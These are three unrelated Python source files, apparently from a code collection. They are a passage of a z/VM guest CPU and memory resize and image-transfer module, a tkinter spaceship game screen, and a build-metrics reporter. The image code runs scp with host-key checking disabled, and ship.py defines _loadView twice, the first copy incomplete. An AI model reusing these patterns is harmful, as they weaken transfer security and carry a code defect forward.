updated_addrs = available_addrs[0:count - defined_count]
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Define new cpus in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("New CPUs defined in user directory for '%s' "
"successfully" % userid)
return (action, updated_addrs, max_cpus)
else:
action = 2
# Delete CPUs
defined_addrs.sort()
updated_addrs = defined_addrs[-(defined_count - count):]
# Delete the last few cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid,
"--operands"))
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Delete CPUs in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("CPUs '%s' deleted from user directory for '%s' "
"successfully" % (str(updated_addrs), userid))
return (action, updated_addrs, max_cpus)
def live_resize_cpus(self, userid, count):
# Get active cpu count and compare with requested count
# If request count is smaller than the current count, then report
# error and exit immediately.
active_addrs = self._get_active_cpu_addrs(userid)
active_count = len(active_addrs)
if active_count > count:
LOG.error("Failed to live resize cpus of guest: %(uid)s, "
"current active cpu count: %(cur)i is greater than "
"the requested count: %(req)i." %
{'uid': userid, 'cur': active_count,
'req': count})
raise exception.SDKConflictError(modID='guest', rs=2,
userid=userid,
active=active_count,
req=count)
# Static resize CPUs. (add or delete CPUs from user directory)
(action, updated_addrs, max_cpus) = self.resize_cpus(userid, count)
if active_count == count:
# active count equals to requested
LOG.info("Current active cpu count of guest: '%s' equals to the "
"requested count: '%i', no more actions needed for "
"live resize." % (userid, count))
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
return
else:
# Get the number of cpus to add to active and check address
active_free = self._get_available_cpu_addrs(active_addrs,
max_cpus)
active_free.sort()
active_new = active_free[0:count - active_count]
# Do live resize
# Define new cpus
cmd_str = "vmcp def cpu " + ' '.join(active_new)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Define cpu of guest: '%s' to active failed with . "
"error: %s." % (userid, err1.format_message()))
# Start to do rollback
if action == 0:
LOG.error(msg1)
else:
LOG.error(msg1 + (" Will revert the user directory "
"change."))
# Combine influenced cpu addrs
cpu_entries = ""
for addr in updated_addrs:
cpu_entries += (" -k CPU=CPUADDR=%s" % addr)
rd = ''
if action == 1:
# Delete added CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM"
% userid, " --operands"))
else:
# Add deleted CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Create_DM"
% userid, " --operands"))
rd += cpu_entries
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
msg = ("Failed to revert user directory change for '"
"%s', SMT error: %s" % (userid,
err2.format_message()))
LOG.error(msg)
else:
LOG.info("Revert user directory change for '%s' "
"successfully." % userid)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
# Activate successfully, rescan in Linux layer to hot-plug new cpus
LOG.info("Added new CPUs to active configuration of guest '%s'" %
userid)
try:
self.execute_cmd(userid, "chcpu -r")
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Rescan cpus to hot-plug new defined cpus for guest: "
"'%s' failed with error: %s. No rollback is done and you"
"may need to check the status and restart the guest to "
"make the defined cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=8, userid=userid,
err=msg)
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
def _get_defined_memory(self, userid):
user_direct = self.get_user_direct(userid)
defined_mem = max_mem = reserved_mem = -1
for ent in user_direct:
# u'USER userid password storage max privclass'
if ent.startswith("USER "):
fields = ent.split(' ')
if len(fields) != 6:
# This case should not exist if the target user
# is created by zcc and not updated manually by user
break
defined_mem = int(zvmutils.convert_to_mb(fields[3]))
max_mem = int(zvmutils.convert_to_mb(fields[4]))
# For legacy guests, the reserved memory may not be defined
if ent.startswith("COMMAND DEF STOR RESERVED"):
reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4]))
return (defined_mem, max_mem, reserved_mem, user_direct)
def _replace_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
entry_str = ""
if isinstance(user_entry, list):
for ent in user_entry:
if ent == "":
# skip empty line
continue
else:
entry_str += (ent + '\n')
else:
entry_str = user_entry
tmp_folder = tempfile.mkdtemp()
tmp_user_direct = os.path.join(tmp_folder, userid)
with open(tmp_user_direct, 'w') as f:
f.write(entry_str)
rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid,
"--operands ",
"-f %s" % tmp_user_direct))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err1:
msg = ("Replace definition of guest '%s' failed with "
"SMT error: %s." % (userid, err1.format_message()))
LOG.error(msg)
LOG.debug("Unlocking the user directory.")
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
else:
LOG.debug("Guest '%s' unlocked successfully." % userid)
# at the end, raise the replace error for upper layer to handle
raise err1
finally:
self._pathutils.clean_temp_folder(tmp_folder)
def _lock_user_direct(self, userid):
rd = ("SMAPI %s API Image_Lock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
# ignore the "already locked" error
if ((e.results['rc'] == 400) and (e.results['rs'] == 12)):
LOG.debug("Image is already unlocked.")
else:
msg = ("Lock definition of guest '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise e
def resize_memory(self, userid, memory):
# Check defined storage in user entry.
# Update STORAGE and RESERVED accordingly.
size = int(zvmutils.convert_to_mb(memory))
(defined_mem, max_mem, reserved_mem,
user_direct) = self._get_defined_memory(userid)
# Check max memory is properly defined
if max_mem == -1 or reserved_mem == -1:
LOG.error("Memory resize for guest '%s' cann't be done."
"Failed to get the defined/max/reserved memory size "
"from user directory." % userid)
raise exception.SDKConflictError(modID='guest', rs=19,
userid=userid)
action = 0
# Make sure requested size is less than the maximum memory size
if size > max_mem:
LOG.error("Memory resize for guest '%s' cann't be done. The "
"requested memory size: '%im' exceeds the maximum "
"size allowed: '%im'." %
(userid, size, max_mem))
raise exception.SDKConflictError(modID='guest', rs=20,
userid=userid,
req=size, max=max_mem)
# check if already satisfy request
if defined_mem == size:
LOG.info("The current defined memory size in user '%s' equals "
"to requested size: %im, no action for memory resize "
"needed." % (userid, size))
return (action, defined_mem, max_mem, user_direct)
else:
# set action to 1 to represent that revert need to be done when
# live resize failed.
action = 1
# get the new reserved memory size
new_reserved = max_mem - size
# prepare the new user entry content
entry_str = ""
for ent in user_direct:
if ent == '':
# Avoid adding an empty line in the entry file
# otherwise Image_Replace_DM would return syntax error.
continue
new_ent = ""
if ent.startswith("USER "):
fields = ent.split(' ')
for i in range(len(fields)):
# update fields[3] to new defined size
if i != 3:
new_ent += (fields[i] + ' ')
else:
new_ent += (str(size) + 'M ')
# remove the last space
new_ent = new_ent.strip()
elif ent.startswith("COMMAND DEF STOR RESERVED"):
new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved)
else:
new_ent = ent
# append this new entry
entry_str += (new_ent + '\n')
# Lock and replace user definition with the new_entry content
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
LOG.debug("User directory Locked successfully for guest '%s' " %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, entry_str)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
# Finally return useful info
return (action, defined_mem, max_mem, user_direct)
def _revert_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed:
# print revert error and return
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory Locked successfully for guest '%s'." %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, user_entry)
except exception.SDKSMTRequestFailed:
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory reverted successfully for guest '%s'." %
userid)
def _get_active_memory(self, userid):
# Return an integer value representing the active memory size in mb
output = self.execute_cmd(userid, "lsmem")
# cmd output contains following line:
# Total online memory : 8192 MB
active_mem = 0
for e in output:
if e.startswith("Total online memory : "):
try:
mem_info = e.split(' : ')[1].split(' ')
# sample mem_info: [u'2048', u'MB']
active_mem = int(zvmutils.convert_to_mb(mem_info[0] +
mem_info[1][0]))
except (IndexError, ValueError, KeyError, TypeError):
errmsg = ("Failed to get active storage size for guest: %s"
% userid)
LOG.error(errmsg)
raise exception.SDKInternalError(msg=errmsg)
break
return active_mem
def live_resize_memory(self, userid, memory):
# Get active memory size and compare with requested size
# If request size is smaller than the current size, then report
# error and exit immediately.
size = int(zvmutils.convert_to_mb(memory))
active_size = self._get_active_memory(userid)
if active_size > size:
LOG.error("Failed to live resize memory of guest: %(uid)s, "
"current active memory size: %(cur)im is greater than "
"the requested size: %(req)im." %
{'uid': userid, 'cur': active_size,
'req': size})
raise exception.SDKConflictError(modID='guest', rs=18,
userid=userid,
active=active_size,
req=size)
# Static resize memory. (increase/decrease memory from user directory)
(action, defined_mem, max_mem,
user_direct) = self.resize_memory(userid, memory)
# Compare active size and requested size, then update accordingly
if active_size == size:
# online memory already satisfied
LOG.info("Current active memory size of guest: '%s' equals to the "
"requested size: '%iM', no more actions needed for "
"live resize." % (userid, size))
LOG.info("Live resize memory for guest: '%s' finished "
"successfully." % userid)
return
else:
# Do live resize. update memory size
increase_size = size - active_size
# Step1: Define new standby storage
cmd_str = ("vmcp def storage standby %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as e:
# rollback and return
msg = ("Define standby memory of guest: '%s' failed with "
"error: %s." % (userid, e.format_message()))
LOG.error(msg)
# Start to do rollback
if action == 1:
LOG.debug("Start to revert user definition of guest '%s'."
% userid)
self._revert_user_direct(userid, user_direct)
# Finally, raise the error and exit
raise exception.SDKGuestOperationError(rs=11,
userid=userid,
err=e.format_message())
# Step 2: Online new memory
cmd_str = ("chmem -e %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Online memory of guest: '%s' failed with "
"error: %s." % (userid, err1.format_message()))
LOG.error(msg1)
# Start to do rollback
LOG.info("Start to do revert.")
LOG.debug("Reverting the standby memory.")
try:
self.execute_cmd(userid, "vmcp def storage standby 0M")
except exception.SDKSMTRequestFailed as err2:
# print revert error info and continue
msg2 = ("Revert standby memory of guest: '%s' failed with "
"error: %s." % (userid, err2.format_message()))
LOG.error(msg2)
# Continue to do the user directory change.
if action == 1:
LOG.debug("Reverting the user directory change of guest "
"'%s'." % userid)
self._revert_user_direct(userid, user_direct)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
LOG.info("Live resize memory for guest: '%s' finished successfully."
% userid)
def is_rhcos(self, os_version):
return os_version.lower().startswith('rhcos')
def _get_wwpn_lun(self, userid):
user_direct = self.get_user_direct(userid)
wwpn = None
lun = None
for ent in user_direct:
if ent.upper().startswith("LOADDEV PORT"):
wwpn = ent.split()[2].strip()
elif ent.upper().startswith("LOADDEV LUN"):
lun = ent.split()[2].strip()
return (wwpn, lun)
class FilesystemBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
"""Import image from remote host to local image repository using scp.
If remote_host not specified, it means the source file exist in local
file system, just copy the image to image repository
"""
source = urlparse.urlparse(url).path
if kwargs['remote_host']:
if '@' in kwargs['remote_host']:
source_path = ':'.join([kwargs['remote_host'], source])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Copying image file from remote filesystem failed"
" with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=10, err=output)
else:
msg = ("The specified remote_host %s format invalid" %
kwargs['remote_host'])
LOG.error(msg)
raise exception.SDKImageOperationError(rs=11,
rh=kwargs['remote_host'])
else:
LOG.debug("Remote_host not specified, will copy from local")
try:
shutil.copyfile(source, target)
except Exception as err:
msg = ("Import image from local file system failed"
" with reason %s" % six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=12,
err=six.text_type(err))
@classmethod
def image_export(cls, source_path, dest_url, **kwargs):
"""Export the specific image to remote host or local file system """
dest_path = urlparse.urlparse(dest_url).path
if kwargs['remote_host']:
target_path = ':'.join([kwargs['remote_host'], dest_path])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target_path])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when copying image file to remote "
"host with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=21, msg=output)
else:
# Copy to local file system
LOG.debug("Remote_host not specified, will copy to local server")
try:
shutil.copyfile(source_path, dest_path)
except Exception as err:
msg = ("Export image from %(src)s to local file system"
" %(dest)s failed: %(err)s" %
{'src': source_path,
'dest': dest_path,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=22,
err=six.text_type(err))
class HTTPBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
import_image = MultiThreadDownloader(image_name, url,
target)
import_image.run()
class MultiThreadDownloader(threading.Thread):
def __init__(self, image_name, url, target):
super(MultiThreadDownloader, self).__init__()
self.url = url
# Set thread number
self.threadnum = 8
r = requests.head(self.url)
# Get the size of the download resource
self.totalsize = int(r.headers['Content-Length'])
self.target = target
def handle_download_errors(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as err:
self.fd.close()
msg = ("Download image from http server failed: %s" %
six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=9,
err=six.text_type(err))
return wrapper
def get_range(self):
ranges = []
offset = int(self.totalsize / self.threadnum)
for i in range(self.threadnum):
if i == self.threadnum - 1:
ranges.append((i * offset, ''))
else:
# Get the process range for each thread
ranges.append((i * offset, (i + 1) * offset))
return ranges
def download(self, start, end):
headers = {'Range': 'Bytes=%s-%s' % (start, end),
'Accept-Encoding': '*'}
# Get the data
res = requests.get(self.url, headers=headers)
# seek to the right position for writing data
LOG.debug("Downloading file range %s:%s success" % (start, end))
with _LOCK:
self.fd.seek(start)
self.fd.write(res.content)
@handle_download_errors
def run(self):
self.fd = open(self.target, 'w')
thread_list = []
n = 0
for ran in self.get_range():
start, end = ran
LOG.debug('thread %d start:%s,end:%s' % (n, start, end))
n += 1
# Open thread
thread = threading.Thread(target=self.download, args=(start, end))
thread.start()
thread_list.append(thread)
for i in thread_list:
i.join()
LOG.info('Download %s success' % (self.name))
self.fd.close()
|
ship.py
|
import tkinter as tk
from utils.fonts import _getFont
from game.panel import Switch, BinaryButton, ButtonGroup, VerticalSlider, HorizontalSlider
from time import sleep
from threading import Thread
Y_OFFSET = 220
PANEL_HEIGHT = 127
PANEL_WIDTH = 140
class Ship(tk.Canvas):
def __init__(self, root):
tk.Canvas.__init__(self, root, width=700, height=600, bd=0, highlightthickness=0, bg='black')
self.root = root
self.gameConnection = self.root.gameConnection
self.udpPacket = self.root.udpPacket
self._loadView()
self._preparePanels()
self._prepareControls(self.root.gameData['player_index'])
Thread(target=self.clockTick).start()
Thread(target=self.commandListener).start()
def addPanel(self, **kw):
# x: (0:4)
# y: (0:2)
width, height, gridPos = (kw['width'], kw['height'], kw['gridPos'])
self.create_image(
gridPos[0] * PANEL_WIDTH,
gridPos[1] * PANEL_HEIGHT + Y_OFFSET,
image=self.panels['%dx%d' % (width, height)],
anchor=tk.NW
)
def _preparePanels(self):
circuits = tk.PhotoImage(file='assets/background/circuits.png')
# Panels
panel1x1 = tk.PhotoImage(file='assets/panels/1x1.png')
panel1x2 = tk.PhotoImage(file='assets/panels/1x2.png')
panel2x1 = tk.PhotoImage(file='assets/panels/2x1.png')
panel2x2 = tk.PhotoImage(file='assets/panels/2x2.png')
panel3x1 = tk.PhotoImage(file='assets/panels/3x1.png')
self.panels = {
'1x1': panel1x1,
'1x2': panel1x2,
'2x1': panel2x1,
'2x2': panel2x2,
'3x1': panel3x1
}
self.circuits = circuits.zoom(2)
self.create_image(700, Y_OFFSET, image=self.circuits, anchor=tk.NE)
def _loadView(self):
ship = tk.PhotoImage(file='assets/elements/ship-small.png')
instruction = tk.PhotoImage(file='assets/elements/instruction.png')
timer_empty = tk.PhotoImage(file='assets/elements/timer-empty-transparent.png')
space = tk.PhotoImage(file='assets/elements/space-top.png')
def _loadView(self):
ship = tk.PhotoImage(file='assets/elements/ship-small.png')
instruction = tk.PhotoImage(file='assets/elements/instruction.png')
timer_empty = tk.PhotoImage(file='assets/elements/timer-empty-transparent.png')
space = tk.PhotoImage(file='assets/elements/space-top.png')
self.ship = ship
self.instruction = instruction.zoom(3).subsample(2)
self.timer_empty = timer_empty.zoom(3).subsample(2)
self.space = space
self.create_image(0, 0, image=self.space, anchor=tk.NW)
self.create_image(400, 50, image=self.ship, tags='SHIP')
# Instruction
for distance in range(8):
self.create_image(distance * 95, 100, image=self.instruction, anchor=tk.NW)
self.create_rectangle(0, 195, 700, 220, fill='green', outline='', tags='TIMER')
self.create_image(0, 195, image=self.timer_empty, anchor=tk.NW)
self.create_image(480, 195, image=self.timer_empty, anchor=tk.NW)
self.create_text(30, 150, text='▶ ' + self.root.gameData['command'], fill='white', font=_getFont('heading'), anchor=tk.W, tags='COMMAND_VIEW')
def clockTick(self):
while True:
tick = self.root.gameData['currentTime']
total = self.root.gameData['totalTime']
c = self.coords('TIMER')
self.coords('TIMER', c[0], c[1], round((tick / total) * 700), c[3])
if c[2] < 420 and c[2] > 210:
self.itemconfig('TIMER', fill='yellow')
elif c[2] < 210:
self.itemconfig('TIMER', fill='red')
sleep(0.1)
self.itemconfig('TIMER', fill='green')
def commandListener(self):
prevCommand = self.root.gameData['command']
while True:
if prevCommand != self.root.gameData['command']:
prevCommand = self.root.gameData['command']
self.itemconfig('COMMAND_VIEW', text='▶ ' + prevCommand)
def _prepareControls(self, player):
if player == 0:
self.controls = [
Switch(self, 'Calcium Razor', 'CALCIUM_RAZOR', (0, 0)),
BinaryButton(self, 'Salty Cannister', 'SALTY_CANNISTER', (1, 0)),
BinaryButton(self, 'Waveform Collider', 'WAVEFORM_COLLIDER', (1, 1)),
ButtonGroup(self, 'Protolube Optimizer', 'PROTOLUBE_OPTIMIZER', (3, 0), ['Defragment', 'Fragment']),
VerticalSlider(self, 'Quasipaddle', 'QUASIPADDLE', (0, 1)),
HorizontalSlider(self, 'Psylocibin Capacitor', 'PSYLOCIBIN_CAPACITOR', (1, 2)),
Switch(self, 'Arcball Pendulum', 'ARCBALL_PENDULUM', (4, 2), horizontal=False),
]
elif player == 1:
self.controls = [
VerticalSlider(self, 'Lorentz Whittler', 'LORENTZ_WHITTLER', (0, 0)),
VerticalSlider(self, 'Alpha Wave', 'ALPHA_WAVE', (1, 0)),
BinaryButton(self, 'Holospindle ', 'HOLOSPINDLE', (0, 2)),
ButtonGroup(self, 'Contracting Propeller', 'CONTRACTING_PROPELLER', (2, 0), ['Acquire', 'Kick']),
HorizontalSlider(self, 'Iodine Shower', 'IODINE_SHOWER', (2, 2)),
Switch(self, 'Orbring', 'ORBRING', (4, 0)),
]
self.addPanel(width=1, height=1, gridPos=(4, 1))
elif player == 2:
self.controls = [
ButtonGroup(self, 'Kilobypass Transformer', 'KILOBYPASS_TRANSFORMER', (0, 0), ['Engage', 'Disengage']),
Switch(self, 'Altitude Operator', 'ALTITUDE_OPERATOR', (0, 2), horizontal=False),
Switch(self, 'Glycol Pump', 'GLYCOL_PUMP', (1, 2), horizontal=False),
HorizontalSlider(self, 'Fluxloosener Inducer', 'FLUXLOOSENER_INDUCER', (2, 0)),
VerticalSlider(self, 'Pressurized Varnish', 'PRESSURIZED_VARNISH', (2, 1)),
BinaryButton(self, 'Cabin Fan ', 'CABIN_FAN', (3, 2)),
Switch(self, 'Gamma Radiator', 'GAMMA_RADIATOR', (4, 1)),
]
self.addPanel(width=1, height=1, gridPos=(3, 1))
elif player == 3:
self.controls = [
HorizontalSlider(self, 'Thermonuclear Resonator', 'THERMONUCLEAR_RESONATOR', (0, 0)),
ButtonGroup(self, 'Docking Probe', 'DOCKING_PROBE', (0, 1), ['Extend', 'Retract']),
VerticalSlider(self, 'SCE Power', 'SCE_POWER', (2, 1)),
BinaryButton(self, 'Suit Composition', 'SUIT_COMPOSITION', (3, 0)),
Switch(self, 'H2O Flow', 'H2O_FLOW', (3, 1)),
Switch(self, 'Waste Dump', 'WASTE_DUMP', (3, 2)),
VerticalSlider(self, 'Int Lights', 'INT_LIGHTS', (4, 1)),
]
|
build_metrics_reporter.py
|
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
import datetime
import json
try:
import queue # Python 2
except ImportError:
import Queue as queue # Python 3
import threading
import time
import traceback
import logging
import os
import socket
import sys
BUILD_METRICS_FILENAME = 'build_metrics.txt'
LOG_FILE_NAME = 'build_metrics_reporter.log'
MetricUnit = \
{
'Seconds':'Seconds',
'Milliseconds':'Milliseconds',
'Microseconds':'Microseconds',
'Bytes':'Bytes',
'Kilobytes':'Kilobytes',
'Megabytes':'Megabytes',
'Gigabytes':'Gigabytes',
'Terabytes':'Terabytes',
'Bits':'Bits',
'Kilobits':'Kilobits',
'Megabits':'Megabits',
'Gigabits':'Gigabits',
'Terabits':'Terabits',
'Percent':'Percent',
'Count':'Count',
'BytesPerSecond':'Bytes/Second',
'KilobytesPerSecond':'Kilobytes/Second',
'MegabytesPerSecond':'Megabytes/Second',
'GigabytesPerSecond':'Gigabytes/Second',
'TerabytesPerSecond':'Terabytes/Second',
'BitsPerSecond':'Bits/Second',
'KilobitsPerSecond':'Kilobits/Second',
'MegabitsPerSecond':'Megabits/Second',
'GigabitsPerSecond':'Gigabits/Second',
'TerabitsPerSecond':'Terabits/Second',
'CountPerSecond':'Count/Second',
'Unitless':'None'
}
def datetime_to_iso(dt):
"""Given a datetime object, convert it to an ISO-8601 formatted string."""
return dt.strftime('%Y-%m-%dT%H:%M:%S.%f')
class MetricDatum(object):
"""Represents a single metric data point for reporting."""
def __init__(self, name, units, timestamp=None):
self.dimensions = {}
self.name = name
self.timestamp = timestamp
if self.timestamp is None:
self.timestamp = datetime.datetime.utcnow()
self.units = units
self.value = 0.0
self.additional_metadata = {}
def __str__(self):
return json.dumps(self.to_api_format())
def to_api_format(self):
dimensions = []
for key in self.dimensions:
dimensions.append({'Name': key, 'Value': self.dimensions[key]})
json_val = {
'MetricName': self.name,
'Dimensions': dimensions,
'Timestamp': datetime_to_iso(self.timestamp),
'Value': float(self.value),
'Unit': self.units if self.units is not None else MetricUnit['Unitless'],
'Metadata': self.additional_metadata
}
return json_val
class MetricReporter(object):
MAX_DIMENSIONS_PER_METRIC = 10
MAX_DATUM_COUNT_PER_REQUEST = 20
METRIC_QUEUE_TIMEOUT_SECS = 1
SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, namespace, async_option=True):
"""Create a new Metric Reporter.
If async=True (the default), the reporter will not transmit
anything until the 'start' method is called. start() will cause a background thread to be spun up that
will handle transmitting metrics.
If async=False, metrics will queue up in memory and will not be transmitted until flush() is called."""
self.namespace = namespace
self.global_dimensions = {}
self.async_option = async_option
self.project_spec = None
self.metrics_namespace = None
self.use_incredibuild = False
self.output_directories = []
self.additional_metric_metadata = {}
self._last_transmit_time = None
self._pending_metrics_queue = queue.Queue()
self._running = False
self._metric_send_thread = None
self._pending_condition = threading.Condition()
self._force_flush = False
self._logger = logging.getLogger('MetricReporter')
# truncate the log file, eventually we need to send the logs to cloudwatch logs
with open(LOG_FILE_NAME, 'w'):
pass
fileHdlr = logging.FileHandler(LOG_FILE_NAME)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
fileHdlr.setFormatter(formatter)
self._logger.addHandler(fileHdlr)
self._logger.setLevel(logging.DEBUG)
self._logger.info('Created MetricReporter.')
self.command_line = sys.argv
def _wake_up_background_thread(self):
"""Signal the background thread to wake up and check the metric queue."""
if not self.async_option:
return
self._pending_condition.acquire()
try:
self._pending_condition.notify()
finally:
self._pending_condition.release()
def parse_command_line(self, command_line):
self._logger.info('Parsing command line...')
for index, arg in enumerate(command_line):
if arg == '-p' or arg == '--project-spec':
if index+1 < len(command_line):
self.project_spec = command_line[index+1]
elif arg == '--metrics-namespace':
if index+1 < len(command_line):
self.metrics_namespace = command_line.pop(index+1)
elif arg.lower() == '--use-incredibuild=true':
self.use_incredibuild=True
#strip the metrics parameters from argv so WAF doesn't complain about it later
try:
command_line.remove('--metrics-namespace')
except ValueError: # if for some reason this isn't in here we don't want the process to end, it's fine to move on
pass
try:
command_line.remove('--enable-build-metrics')
except ValueError:
pass
if self.metrics_namespace is None:
return False
return True
def set_build_command(self, cmd):
self.additional_metric_metadata['build_command'] = cmd
def start(self):
"""Start the background metrics thread. Has no effect is async=False or if
start() has already been called."""
self._logger.info('Starting MetricReporter.')
if not self.async_option or self._running:
return
self._running = True
self.additional_metric_metadata['host_name'] = socket.gethostname()
self.additional_metric_metadata['metrics_namespace'] = str(self.metrics_namespace)
self.additional_metric_metadata['project_spec'] = str(self.project_spec)
self.additional_metric_metadata['use_incredibuild'] = str(self.use_incredibuild)
# this gets replaced later
self.additional_metric_metadata['build_result'] = "#BUILD_RESULT#"
build_id = os.getenv('BUILD_ID')
command_id = os.getenv('COMMAND_ID')
if build_id is None:
self._logger.error('No build id is set! These metrics will be lost!')
else:
self.additional_metric_metadata['build_id'] = build_id
if command_id is None:
self._logger.error('No command is is set! These metrics will be lost!')
else:
self.additional_metric_metadata['command_id'] = command_id
self._metric_send_thread = threading.Thread(target=self._metric_loop)
self._metric_send_thread.daemon = True
self._metric_send_thread.start()
def stop(self, gather_output_sizes=False, wait_for_empty_queue=False):
"""Stop the background metrics thread.
If 'wait_for_empty_queue' is set to True, calling thread will block until all metrics have been
transmitted or shutdown times out.
Has no effect if async=False or if background thread is not running."""
if not self.async_option or not self._running:
return
# setting async to false here will make the flush call later on dump the queue immediately instead of trying
# to wake up the background thread
self.async_option = False
if gather_output_sizes:
self.gather_output_sizes()
self._running = False
self.flush()
if wait_for_empty_queue:
self._logger.info('waiting for empty queue')
self._metric_send_thread.join(timeout=MetricReporter.SHUTDOWN_TIMEOUT_SECS)
for handler in list(self._logger.handlers):
handler.close()
self._logger.removeHandler(handler)
def flush(self):
"""If async=True, wakes up background thread and forces a flush of any stored metrics.
If async=False, this call will block on a synchronous flush of metrics to file."""
if self.async_option:
self._force_flush = True
self._wake_up_background_thread()
else:
while not self._pending_metrics_queue.empty():
try:
self._write_metrics_to_file()
except :
break
def create_metric(self, name, units, timestamp=None):
"""
Creates a metric with the given name, units & timestamp.
If timestamp is not specified, it will default to the current time.
This method is preferred to directly creating a MetricDatum object because it will also apply
global dimensions that have been set.
"""
metric = MetricDatum(name, units, timestamp)
for key in self.global_dimensions:
if len(metric.dimensions) >= MetricReporter.MAX_DIMENSIONS_PER_METRIC:
self._logger.warning('Too many dimensions for %s metric: %')
break
metric.dimensions[key] = self.global_dimensions[key]
metric.additional_metadata = self.additional_metric_metadata
return metric
def put_metric(self, metric):
"""
Put a new metric on the queue to be transmitted.
If the pending metrics queue is full, the metric will just be ignored and an error printed.
"""
if not self._running:
return
try:
self._logger.info('MetricsReporter:Metric submitted: %s' % metric.name)
self._pending_metrics_queue.put_nowait(metric)
except queue.Full:
self._logger.error('Metrics queue is full. Ignoring new metric named "%s"' % metric.name)
if self.async_option:
self._wake_up_background_thread()
def add_output_directory(self, out_dir):
self.output_directories.append(out_dir)
def gather_output_sizes(self):
"""
Walk through each output directory and determine it's size, adding them together to determine the final
overall size of the build
"""
if len(self.output_directories) == 0:
return
self._logger.info('gathering output sizes...')
size_in_bytes = 0
for dir in self.output_directories:
size = sum( os.path.getsize(os.path.join(dirpath,filename)) for dirpath, dirnames, filenames in os.walk( dir ) for filename in filenames )
size_in_bytes += size
submit_metric(self, 'build_size', MetricUnit['Bytes'], size_in_bytes)
self.flush()
def _write_metrics_to_file(self):
metrics_to_write = []
while not self._pending_metrics_queue.empty() and len(metrics_to_write) < MetricReporter.MAX_DATUM_COUNT_PER_REQUEST:
try:
metric = self._pending_metrics_queue.get(True, MetricReporter.METRIC_QUEUE_TIMEOUT_SECS)
if metric:
metrics_to_write.append(metric.to_api_format())
except queue.Empty:
pass
self._logger.info('Writing %s metrics to file' % str(len(metrics_to_write)))
if metrics_to_write:
with open(BUILD_METRICS_FILENAME, 'a') as f:
for metric in metrics_to_write:
self._logger.info('Writing metric %s' % str(metric))
